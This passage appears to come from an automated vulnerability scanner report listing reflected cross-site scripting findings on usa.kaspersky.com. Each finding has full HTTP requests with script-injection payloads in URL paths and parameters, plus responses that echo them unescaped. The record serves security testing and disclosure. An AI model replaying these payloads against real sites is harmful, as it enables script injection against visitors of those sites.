s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesdbd00"-alert(1)-"9a65bf5e617/home-computer-security/one?ICID=INT1674070";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.37. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eccc"><script>alert(1)</script>43dd8730ca1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services8eccc"><script>alert(1)</script>43dd8730ca1/home-computer-security/one?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:00 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387760"
Content-Type: text/html; charset=utf-8
Content-Length: 40409
Date: Sun, 23 Oct 2011 16:36:09 GMT
X-Varnish: 1652566221
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services8eccc"><script>alert(1)</script>43dd8730ca1/home-computer-security/one?ICID=INT1674070" />
...[SNIP]...

1.38. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2132c"-alert(1)-"b25a63ae213 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/home-computer-security2132c"-alert(1)-"b25a63ae213/one?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:10 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387830"
Content-Type: text/html; charset=utf-8
Content-Length: 40959
Date: Sun, 23 Oct 2011 16:37:13 GMT
X-Varnish: 1652569676
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security2132c"-alert(1)-"b25a63ae213/one?ICID=INT1674070";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.39. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5069"><script>alert(1)</script>a473c0fcddb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-securityc5069"><script>alert(1)</script>a473c0fcddb/one?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:36:50 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387810"
Content-Type: text/html; charset=utf-8
Content-Length: 39454
Date: Sun, 23 Oct 2011 16:36:55 GMT
X-Varnish: 1652568778
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-securityc5069"><script>alert(1)</script>a473c0fcddb/one?ICID=INT1674070" />
...[SNIP]...

1.40. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8599"><script>alert(1)</script>f8f7fc35135 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/onec8599"><script>alert(1)</script>f8f7fc35135?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:31 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387851"
Content-Type: text/html; charset=utf-8
Content-Length: 40220
Date: Sun, 23 Oct 2011 16:37:34 GMT
X-Varnish: 1652570768
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/onec8599"><script>alert(1)</script>f8f7fc35135?ICID=INT1674070" />
...[SNIP]...

1.41. http://usa.kaspersky.com/products-services/home-computer-security/one [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/one

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b67bb"-alert(1)-"5f681d3f7a7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-services/home-computer-security/oneb67bb"-alert(1)-"5f681d3f7a7?ICID=INT1674070 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:37:43 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387863"
Content-Type: text/html; charset=utf-8
Content-Length: 40966
Date: Sun, 23 Oct 2011 16:37:49 GMT
X-Varnish: 1652571491
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
geName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-services/home-computer-security/oneb67bb"-alert(1)-"5f681d3f7a7?ICID=INT1674070";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.42. http://usa.kaspersky.com/products-services/home-computer-security/one [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-services/home-computer-security/one

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66a39"><script>alert(1)</script>f687e1ff6b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-services/home-computer-security/one?ICID=INT1674070&66a39"><script>alert(1)</script>f687e1ff6b2=1 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://usa.kaspersky.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:35:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387740"
Content-Type: text/html; charset=utf-8
Content-Length: 78540
Date: Sun, 23 Oct 2011 16:35:51 GMT
X-Varnish: 1652565254
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070&66a39"><script>alert(1)</script>f687e1ff6b2=1" />
...[SNIP]...

1.43. http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one [ICID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one

Issue detail

The value of the ICID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4b13"><script>alert(1)</script>d889b6155ed was submitted in the ICID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070d4b13"><script>alert(1)</script>d889b6155ed HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; s_cc=true; intcamp=INT1674070; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_nr=1319387576026-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Personal%252520%252526%252520Family%252520Security%252520%25257C%252520ONE%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.digitalriver.com%25252Fstore%25252Fkasperus%25252Fen_US%25252Fbuy%25252FproductID.237386700%25252F%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:15:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390151"
Content-Type: text/html; charset=utf-8
Content-Length: 40935
Date: Sun, 23 Oct 2011 17:15:54 GMT
X-Varnish: 1652695966
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070d4b13"><script>alert(1)</script>d889b6155ed" />
...[SNIP]...

1.44. http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one [ICID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one

Issue detail

The value of the ICID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df090"-alert(1)-"e41734eef87 was submitted in the ICID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070df090"-alert(1)-"e41734eef87 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; s_cc=true; intcamp=INT1674070; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_nr=1319387576026-New; s_sq=kaspersky-usa%3D%2526pid%253DProducts%252520%252526%252520Services%252520%25257C%252520Personal%252520%252526%252520Family%252520Security%252520%25257C%252520ONE%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.digitalriver.com%25252Fstore%25252Fkasperus%25252Fen_US%25252Fbuy%25252FproductID.237386700%25252F%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 17:16:23 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319390183"
Content-Type: text/html; charset=utf-8
Content-Length: 40780
Date: Sun, 23 Oct 2011 17:16:28 GMT
X-Varnish: 1652697653
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...

s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/products-servicesdbd00%22-alert(document.location)-%229a65bf5e617/home-computer-security/one?ICID=INT1674070df090"-alert(1)-"e41734eef87";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.45. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c637"><script>alert(1)</script>fbc1902e072 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/default/files/9c637"><script>alert(1)</script>fbc1902e072 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1319387187420-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:28:45 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387325"
Content-Type: text/html; charset=utf-8
Content-Length: 39351
Date: Sun, 23 Oct 2011 16:28:59 GMT
X-Varnish: 1652544165
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/default/files/9c637"><script>alert(1)</script>fbc1902e072" />
...[SNIP]...

1.46. http://usa.kaspersky.com/sites/default/files/kaspersky_usatheme_favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/default/files/kaspersky_usatheme_favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7bf8"-alert(1)-"fed9f393e7c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/default/files/b7bf8"-alert(1)-"fed9f393e7c HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; gpv_pageName=Homepage; s_nr=1319387187420-New; s_sq=%5B%5BB%5D%5D; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=21600
Last-Modified: Sun, 23 Oct 2011 16:29:15 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1319387355"
Content-Type: text/html; charset=utf-8
Content-Length: 40144
Date: Sun, 23 Oct 2011 16:29:23 GMT
X-Varnish: 1652546013
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:og="ht
...[SNIP]...
4 = " Thank You"; }
s.pageName = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/default/files/b7bf8"-alert(1)-"fed9f393e7c";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

1.47. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_143.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_143.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8c6d"><script>alert(1)</script>1bca9c0c0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesd8c6d"><script>alert(1)</script>1bca9c0c0c/usa.kaspersky.com/files/css_injector_143.css?3 HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://usa.kaspersky.com/products-services/home-computer-security/one?ICID=INT1674070
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utma=205612169.766366246.1319387189.1319387189.1319387189.1; __utmb=205612169.1.10.1319387189; __utmc=205612169; __utmz=205612169.1319387189.1.1.utmcsr=av-comparatives.org|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|2752201A851585B0-400001712000075D[CE]; gpv_pageName=Homepage; s_nr=1319387320050-New; s_sq=kaspersky-usa%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fusa.kaspersky.com%25252Fproducts-services%25252Fhome-computer-security%25252Fone%25253FICID%25253DINT1674070%2526ot%253DA

Response

